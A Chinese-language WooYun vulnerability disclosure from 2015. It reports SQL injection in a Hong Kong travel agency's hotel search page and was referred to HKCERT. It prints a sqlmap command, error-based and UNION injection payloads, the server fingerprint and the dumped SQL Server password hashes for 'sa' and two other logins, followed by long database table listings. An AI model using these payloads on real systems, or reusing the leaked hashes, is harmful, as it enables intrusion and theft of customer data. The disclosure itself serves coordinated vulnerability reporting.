漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:天洋旅遊某處存在SQL插入攻擊(DBA权限/sa密码泄露/37万用户IP信息泄露)(香港地區)
提交时间:2015-11-10 09:55
修复时间:2016-01-11 15:32
公开时间:2016-01-11 15:32
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理
Tags标签:
无
漏洞详情 披露状态:
2015-11-10: 细节已通知厂商并且等待厂商处理中 2015-11-20: 厂商已经确认,细节仅向厂商公开 2015-11-30: 细节向核心白帽子及相关领域专家公开 2015-12-10: 细节向普通白帽子公开 2015-12-20: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
简要描述: Any Tours's main focus of Business Activities are Corporate Business Travel Arrangements, Full Travel Management and support for M.I.C.E & EVENTS, Interest/Leisure Groups, Incentive travel for Hong Kong, China & Macau inbound /outbound, especially Special Interest Group, like Sports (Rugby, Soccer, Golf, Formula One Grand Prix) & Student Study exchange groups. Any Tours has also invested in the training & development of experienced, energetic and service minded work force. Our team members create, design and build the most exclusive itineraries catering to our clients needs and they are the cornerstone of creating the magic, by providing quality, creativity, innovation and integrity with their great talent, passion and dedication. The company network expands over many countries and has an active working relation with like minded clients and travel industry partners from all over the world Any Tours provides Real time Easy to Access On-line worldwide air ticketing and hotel bookings with full travel information and e -commerce capabilities. Having a presence on the worldwide web since 1997, Any Tours has secured a great place in the e-commerce business of the 21st Century and is aiming to provide high and easy accessibility to worldwide & automated travel services for clients and travel partners' conveniences 24 x 7, around the clock. Our key words when dealing with our partners & clients are taking personal responsibility for providing the High Quality Services & Products with Efficiency, Reliability and Satisfaction with Trust.
详细说明: 地址:http://**.**.**.**/tch/Hotel/search/?action=city&code=TYO"
python sqlmap.py -u "http://**.**.**.**/tch/Hotel/search/?action=city&code=TYO" -p code --technique=EU --random-agent --batch --current-user --is-dba --users --passwords --count
Database: Anytours +------------------------------------------------------+---------+ | Table | Entries | +------------------------------------------------------+---------+ | dbo.IpList | 369232 |
漏洞证明:
--- Parameter: code (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: action=city&code=TYO' AND 8122=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (8122=8122) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(122)+CHAR(113))) AND 'sYzx'='sYzx Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: action=city&code=-4812' UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHAR(113)+CHAR(90)+CHAR(116)+CHAR(115)+CHAR(103)+CHAR(103)+CHAR(88)+CHAR(110)+CHAR(83)+CHAR(117)+CHAR(102)+CHAR(119)+CHAR(106)+CHAR(87)+CHAR(106)+CHAR(66)+CHAR(114)+CHAR(83)+CHAR(100)+CHAR(100)+CHAR(97)+CHAR(78)+CHAR(107)+CHAR(67)+CHAR(98)+CHAR(117)+CHAR(71)+CHAR(109)+CHAR(65)+CHAR(117)+CHAR(89)+CHAR(65)+CHAR(89)+CHAR(90)+CHAR(119)+CHAR(118)+CHAR(105)+CHAR(119)+CHAR(74)+CHAR(113)+CHAR(101)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(122)+CHAR(113)-- - --- web server operating system: Windows 8.1 or 2012 R2 web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5 back-end DBMS: Microsoft SQL Server 2008 current user: 'sa' current user is DBA: True database management system users [3]: [*] ##MS_PolicyEventProcessingLogin## [*] ##MS_PolicyTsqlExecutionLogin## [*] sa database management system users password hashes: [*] ##MS_PolicyEventProcessingLogin## [1]: password hash: 0x01006a67a63793d7beb1fc7e4e749a49c99976069fa2e2adbc9a header: 0x0100 salt: 6a67a637 mixedcase: 93d7beb1fc7e4e749a49c99976069fa2e2adbc9a [*] ##MS_PolicyTsqlExecutionLogin## [1]: password hash: 0x010021671bf66a2f269a3e02a454fa819b225e0a8d8daa68f932 header: 0x0100 salt: 21671bf6 mixedcase: 6a2f269a3e02a454fa819b225e0a8d8daa68f932 [*] sa [1]: password hash: 0x01005175b4d432ed35abba033a7fa0874f4bd1b382b2a92d16df header: 0x0100 salt: 5175b4d4 mixedcase: 32ed35abba033a7fa0874f4bd1b382b2a92d16df Database: ReportServerTempDB +------------------------------------------------------+---------+ | Table | Entries | +------------------------------------------------------+---------+ | dbo.DBUpgradeHistory | 27 | +------------------------------------------------------+---------+ Database: TravelConnect_Log +------------------------------------------------------+---------+ | Table | Entries | +------------------------------------------------------+---------+ | dbo.ReserveLog | 2438 | | dbo.AirPricing | 1325 | | dbo.UrPnrLog | 1121 | | dbo.ErrLog | 45 | +------------------------------------------------------+---------+ Database: msdb +------------------------------------------------------+---------+ | Table | Entries | +------------------------------------------------------+---------+ | dbo.backupfile | 596 | | dbo.MSdbms_datatype_mapping | 493 | | dbo.sysdatatypemappings | 493 | | dbo.MSdbms_map | 374 | | dbo.backupfilegroup | 298 | | dbo.backupmediafamily | 298 | | dbo.backupmediaset | 298 | | dbo.backupset | 298 | | dbo.MSdatatype_mappings | 260 | | dbo.sysjobhistory | 200 | | dbo.MSdbms_datatype | 180 | | dbo.sysmaintplan_log | 90 | | dbo.sysmaintplan_logdetail | 90 | | dbo.syspolicy_facet_events | 84 | | dbo.sysutility_mi_smo_properties_to_collect_internal | 84 | | dbo.syspolicy_management_facets | 83 | | dbo.sysutility_ucp_policy_target_conditions | 24 | | dbo.sysutility_ucp_policy_target_conditions_internal | 24 | | dbo.syscategories | 21 | | dbo.sysutility_ucp_configuration | 13 | | dbo.sysutility_ucp_configuration_internal | 13 | | dbo.syssubsystems | 12 | | dbo.sysutility_ucp_policy_check_conditions | 12 | | dbo.sysutility_ucp_policy_check_conditions_internal | 12 | | dbo.sysschedules | 9 | | dbo.sysschedules_localserver_view | 9 | | dbo.sysssispackages | 9 | | dbo.MSdbms | 8 | | dbo.sysutility_ucp_supported_object_types_internal | 8 | | dbo.sysmail_configuration | 7 | | dbo.syscollector_collection_items | 6 | | dbo.syscollector_collection_items_internal | 6 | | dbo.syscollector_config_store | 5 | | dbo.syscollector_config_store_internal | 5 | | dbo.sysmanagement_shared_server_groups | 5 | | dbo.sysmanagement_shared_server_groups_internal | 5 | | dbo.sysutility_mi_smo_objects_to_collect_internal | 5 | | dbo.restorefile | 4 | | dbo.syscollector_collection_sets | 4 | | dbo.syscollector_collection_sets_internal | 4 | | dbo.syscollector_collector_types | 4 | | dbo.syscollector_collector_types_internal | 4 | | dbo.sysjobsteps | 4 | | dbo.syspolicy_configuration | 4 | | dbo.syspolicy_configuration_internal | 4 | | dbo.sysssispackagefolders | 4 | | dbo.sysdtscategories | 3 | | dbo.restorefilegroup | 2 | | dbo.restorehistory | 2 | | dbo.sysjobactivity | 2 | | dbo.sysjobs | 2 | | dbo.sysjobs_view | 2 | | dbo.sysjobschedules | 2 | | dbo.sysjobservers | 2 | | dbo.sysutility_ucp_policy_configuration | 2 | | dbo.sysdbmaintplans | 1 | | dbo.sysmail_servertype | 1 | | dbo.sysmaintplan_plans | 1 | | dbo.sysmaintplan_subplans | 1 | | dbo.sysoriginatingservers_view | 1 | | dbo.syssessions | 1 | | dbo.systargetservers_view | 1 | | dbo.sysutility_mi_configuration | 1 | | dbo.sysutility_ucp_processing_state_internal | 1 | | dbo.sysutility_ucp_utility_space_utilization | 1 | +------------------------------------------------------+---------+ Database: Anytours +------------------------------------------------------+---------+ | Table | Entries | +------------------------------------------------------+---------+ | dbo.IpList | 369232 | | dbo.Shopcart_CartListD | 334967 | | dbo.Hotel_Item_Links_CHT | 120780 | | dbo.Hotel_Item_Links_CHT | 120780 | | dbo.tBookingOrderD2 | 116622 | | dbo.Hotel_Item_RmCategory_CHT | 98821 | | dbo.Hotel_Item_RmCategory_CHT | 98821 | | dbo.Request_Value | 79377 | | dbo.Hotel_Item_Facilities_CHT | 72004 | | dbo.Hotel_Item_Facilities_CHT | 72004 | | dbo.Hotel_Item_RmFacilities_CHT | 53429 | | dbo.Hotel_Item_RmFacilities_CHT | 53429 | | dbo.Hotel_Item_Report_CHT | 48752 | | dbo.Hotel_Item_Report_CHT | 48752 | | dbo.sGalileoLog | 45412 | | dbo.Hotel_Item_RoomType_CHT | 40925 | | dbo.Hotel_Item_RoomType_CHT | 40925 | | dbo.Request_Passenger | 20280 | | dbo.Request_Passenger | 20280 | | dbo.an2idcity | 16913 | | dbo.GTA_XMLRequestErrorLog | 15834 | | dbo.Hotel_Item_Location_CHT | 11361 | | dbo.Hotel_Item_Location_CHT | 11361 | | dbo.Shopcart_CartListH | 9458 | | dbo.Fare_mCityPort | 9286 | | dbo.Hotel_Item_CHT | 8624 | | dbo.Hotel_Item_CHT | 8624 | | dbo.Airfare_City | 6563 | | dbo.tBookingOrderD_AirfarePax | 6048 | | dbo.tBookingOrderD_AirfarePax | 6048 | | dbo.tBookingOrderD_AirfarePax | 6048 | | dbo.Airfare_Airport | 5437 | | dbo.tPaymentRecoed | 4003 | | dbo.mUser | 3903 | | dbo.tBookingOrderH | 3362 | | dbo.sRecLog | 3306 | | dbo.tBookingOrderEmailRecord | 2152 | | dbo.mAirfare | 1363 | | dbo.Fare_FareSheet_Segment_Flight | 869 | | dbo.Fare_FareSheet_Segment_Flight | 869 | | dbo.Hotel_Area | 809 | | dbo.Airfare_Airline | 795 | | dbo.tBooking_ErrorRecord | 488 | | dbo.tBookingOrderD_RoomPax | 392 | | dbo.an2idairline | 324 | | dbo.iSecurityLevel | 281 | | dbo.iPackageGroup | 261 | | dbo.Airfare_Country | 251 | | dbo.CountryISO | 249 | | dbo.an2idcountry | 248 | | dbo.GTA_ASynchronousResponse | 240 | | dbo.Package_City | 237 | | dbo.IpBlockCountry | 236 | | dbo.User_TelCountryCode | 233 | | dbo.Fare_mCountry | 227 | | dbo.AirfareMarkUpPriceList | 181 | | dbo.Hotel_Country | 173 | | dbo.Insurance_Destination | 173 | | dbo.tBookingOrderD_RoomDesc | 112 | | dbo.tBookingOrderD_RoomDesc | 112 | | dbo.Package_Carrier | 62 | | dbo.LinkMap | 56 | | dbo.mForm | 40 | | dbo.News | 36 | | dbo.Advertisement | 31 | | dbo.Insurance_CodeList | 30 | | dbo.Airfare_ExcludeAirline | 29 | | dbo.an2idfareclass | 29 | | dbo.Airfare_Class | 26 | | dbo.Package_Country | 22 | | dbo.Cruise_CruiseLine | 19 | | dbo.Cruise_CruiseLine | 19 | | dbo.Insurance_PlanFee | 19 | | dbo.Package_Activity | 15 | | dbo.Package_Activity | 15 | | dbo.HotelMarkUpPriceList | 13 | | dbo.Cruise_Country | 12 | | dbo.ApiRecord | 11 | | dbo.AdvertisementType | 10 | | dbo.Hotel_DectinationRanking | 10 | | dbo.Package_DectinationRanking | 10 | | dbo.mOperator_Login | 8 | | dbo.mOperator_Login | 8 | | dbo.Hotel_RoomType | 6 | | dbo.Cruise_CruiseLineRanking | 5 | | dbo.Cruise_DurationRanking | 5 | | dbo.Fare_FareSheet_CarrierRanking | 4 | | dbo.Hotel_Currency | 4 | | dbo.Shopcart_ItemType | 4 | | dbo.Cruise_City | 3 | | dbo.Cruise_City | 3 | | dbo.fSysNumberControl | 3 | | dbo.fSysNumberControl | 3 | | dbo.ApiAuth | 2 | | dbo.Cruise_Type | 2 | | dbo.Hotel_CityGroup | 2 | | dbo.Hotel_CityGroup | 2 | | dbo.Insurance_TravelInsuranceD | 2 | | dbo.mContent | 2 | | dbo.ShopCart_TempDS | 2 | | dbo.Insurance_TravelInsuranceErrorLog | 1 | | dbo.Insurance_TravelInsuranceH | 1 | +------------------------------------------------------+---------+ Database: ReportServer +------------------------------------------------------+---------+ | Table | Entries | +------------------------------------------------------+---------+ | dbo.DBUpgradeHistory | 31 | | dbo.ConfigurationInfo | 23 | | dbo.Roles | 8 | | dbo.PolicyUserRole | 4 | | dbo.Users | 3 | | dbo.Keys | 2 | | dbo.Policies | 2 | | dbo.SecData | 2 | | dbo.ServerUpgradeHistory | 2 | | dbo.Catalog | 1 | | dbo.UpgradeInfo | 1 | +------------------------------------------------------+---------+ Database: master +------------------------------------------------------+---------+ | Table | Entries | +------------------------------------------------------+---------+ | sys.dm_os_buffer_descriptors | 510030 | | sys.dm_os_memory_objects | 485842 | | sys.dm_os_memory_cache_entries | 111745 | | sys.syscacheobjects | 107888 | | sys.dm_exec_cached_plans | 107742 | | sys.messages | 98318 | | sys.sysmessages | 98318 | | sys.dm_exec_query_stats | 54866 | | sys.fulltext_system_stopwords | 15829 | | sys.syscolumns | 12581 | | sys.all_parameters | 7090 | | sys.system_parameters | 7090 | | sys.trace_subclass_values | 5366 | | sys.all_columns | 5285 | | sys.system_columns | 4626 | | sys.trace_event_bindings | 4304 | | sys.dm_os_ring_buffers | 3939 | | sys.syscomments | 2997 | | sys.dm_xe_object_columns | 2674 | | dbo.spt_values | 2508 | | sys.all_objects | 2002 | | sys.sysobjects | 2002 | | sys.system_objects | 1928 | | sys.database_permissions | 1853 | | sys.syspermissions | 1852 | | sys.sysprotects | 1848 | | sys.all_sql_modules | 1785 | | sys.system_sql_modules | 1783 | | sys.dm_xe_map_values | 1733 | | sys.dm_os_virtual_address_dump | 1642 | | sys.dm_os_performance_counters | 1116 | | sys.sysperfinfo | 1116 | | sys.system_internals_partition_columns | 822 | | sys.columns | 659 | | sys.dm_xe_objects | 542 | | sys.dm_os_wait_stats | 490 | | sys.dm_audit_actions | 454 | | sys.spatial_reference_systems | 390 | | sys.dm_db_index_usage_stats | 381 | | sys.dm_exec_query_transformation_stats | 377 | | sys.dm_os_memory_cache_clock_hands | 375 | | sys.event_notification_event_types | 365 | | sys.all_views | 354 | | sys.system_views | 354 | | sys.stats_columns | 352 | | sys.dm_os_memory_clerks | 297 | | sys.index_columns | 271 | | sys.sysindexkeys | 271 | | sys.trigger_event_types | 245 | | sys.sysindexes | 202 | | sys.stats | 194 | | sys.dm_exec_procedure_stats | 182 | | sys.trace_events | 180 | | sys.dm_os_spinlock_stats | 175 | | sys.dm_os_memory_cache_counters | 160 | | sys.dm_os_latch_stats | 144 | | sys.allocation_units | 128 | | sys.system_internals_allocation_units | 128 | | sys.dm_db_partition_stats | 116 | | sys.indexes | 116 | | sys.partitions | 116 | | sys.system_internals_partitions | 116 | | sys.syscharsets | 114 | | sys.xml_schema_facets | 112 | | sys.xml_schema_components | 99 | | sys.dm_os_loaded_modules | 96 | | sys.system_components_surface_area_configuration | 95 | | sys.dm_audit_class_type_map | 83 | | sys.xml_schema_types | 82 | | sys.objects | 74 | | sys.configurations | 70 | | sys.sysconfigures | 70 | | sys.syscurconfigs | 70 | | sys.dm_os_threads | 69 | | sys.trace_columns | 66 | | sys.dm_os_worker_local_storage | 61 | | sys.dm_os_workers | 61 | | sys.dm_db_session_space_usage | 58 | | sys.dm_db_task_space_usage | 58 | | sys.dm_exec_sessions | 58 | | sys.dm_os_memory_pools | 58 | | sys.sysprocesses | 57 | | INFORMATION_SCHEMA.COLUMNS | 50 | | sys.dm_os_memory_cache_hash_tables | 50 | | sys.fulltext_document_types | 50 | | sys.fulltext_languages | 48 | | sys.dm_exec_query_optimizer_info | 39 | | sys.dm_os_tasks | 36 | | sys.systypes | 34 | | sys.types | 34 | | sys.syslanguages | 33 | | sys.dm_exec_connections | 30 | | sys.dm_exec_requests | 29 | | sys.dm_os_memory_node_access_stats | 24 | | sys.dm_tran_locks | 23 | | sys.server_permissions | 23 | | sys.securable_classes | 22 | | sys.server_principals | 22 | | sys.syslockinfo | 22 | | sys.trace_categories | 21 | | sys.database_principals | 18 | | sys.sysaltfiles | 18 | | sys.sysusers | 18 | | sys.xml_schema_component_placements | 18 | | sys.dm_os_stacks | 16 | | sys.master_files | 16 | | INFORMATION_SCHEMA.SCHEMATA | 15 | | sys.dm_db_missing_index_details | 15 | | sys.dm_db_missing_index_group_stats | 15 | | sys.dm_db_missing_index_groups | 15 | | sys.dm_os_waiting_tasks | 15 | | sys.schemas | 15 | | sys.xml_schema_attributes | 15 | | sys.service_message_types | 14 | | sys.dm_db_script_level | 13 | | sys.dm_os_schedulers | 13 | | sys.syslogins | 13 | | sys.service_contract_message_usages | 11 | | sys.dm_tran_active_transactions | 10 | | sys.dm_xe_session_event_actions | 10 | | sys.server_event_session_actions | 10 | | sys.crypt_properties | 8 | | sys.database_mirroring | 8 | | sys.database_recovery_status | 8 | | sys.databases | 8 | | sys.sysdatabases | 8 | | sys.certificates | 7 | | sys.dm_tran_database_transactions | 7 | | INFORMATION_SCHEMA.TABLES | 6 | | sys.dm_os_memory_brokers | 6 | | sys.service_contracts | 6 | | sys.tables | 6 | | INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 | | sys.dm_xe_session_events | 5 | | sys.endpoints | 5 | | sys.server_event_session_events | 5 | | sys.server_role_members | 5 | | sys.dm_exec_query_resource_semaphores | 4 | | sys.dm_os_hosts | 4 | | sys.dm_xe_packages | 4 | | sys.internal_tables | 4 | | dbo.MSreplication_options | 3 | | sys.assembly_types | 3 | | sys.dm_broker_queue_monitors | 3 | | sys.dm_clr_properties | 3 | | sys.dm_os_memory_nodes | 3 | | sys.dm_os_nodes | 3 | | sys.dm_xe_session_object_columns | 3 | | sys.identity_columns | 3 | | sys.login_token | 3 | | sys.service_queue_usages | 3 | | sys.service_queues | 3 | | sys.services | 3 | | sys.sql_logins | 3 | | sys.type_assembly_usages | 3 | | sys.xml_schema_namespaces | 3 | | INFORMATION_SCHEMA.ROUTINES | 2 | | sys.database_files | 2 | | sys.database_role_members | 2 | | sys.dm_exec_trigger_stats | 2 | | sys.dm_fts_memory_pools | 2 | | sys.dm_resource_governor_resource_pools | 2 | | sys.dm_resource_governor_workload_groups | 2 | | sys.key_encryptions | 2 | | sys.procedures | 2 | | sys.resource_governor_resource_pools | 2 | | sys.resource_governor_workload_groups | 2 | | sys.service_contract_usages | 2 | | sys.sql_modules | 2 | | sys.sysfiles | 2 | | sys.sysmembers | 2 | | sys.tcp_endpoints | 2 | | dbo.spt_monitor | 1 | | sys.assemblies | 1 | | sys.assembly_files | 1 | | sys.data_spaces | 1 | | sys.default_constraints | 1 | | sys.dm_db_file_space_usage | 1 | | sys.dm_exec_background_job_queue_stats | 1 | | sys.dm_fts_fdhosts | 1 | | sys.dm_os_dispatcher_pools | 1 | | sys.dm_os_dispatchers | 1 | | sys.dm_os_process_memory | 1 | | sys.dm_os_sys_info | 1 | | sys.dm_os_sys_memory | 1 | | sys.dm_resource_governor_configuration | 1 | | sys.dm_tran_current_transaction | 1 | | sys.dm_xe_session_targets | 1 | | sys.dm_xe_sessions | 1 | | sys.filegroups | 1 | | sys.linked_logins | 1 | | sys.resource_governor_configuration | 1 | | sys.routes | 1 | | sys.server_event_session_fields | 1 | | sys.server_event_session_targets | 1 | | sys.server_event_sessions | 1 | | sys.servers | 1 | | sys.symmetric_keys | 1 | | sys.sysconstraints | 1 | | sys.sysfilegroups | 1 | | sys.sysoledbusers | 1 | | sys.sysservers | 1 | | sys.traces | 1 | | sys.user_token | 1 | | sys.via_endpoints | 1 | | sys.xml_schema_collections | 1 | | sys.xml_schema_model_groups | 1 | | sys.xml_schema_wildcards | 1 | +------------------------------------------------------+---------+
修复方案: 版权声明:转载请注明来源 路人甲 @乌云
漏洞回应 厂商回应: 危害等级:中
漏洞Rank:5
确认时间:2015-11-20 15:17
厂商回复: Referred to related parties.
最新状态: 暂无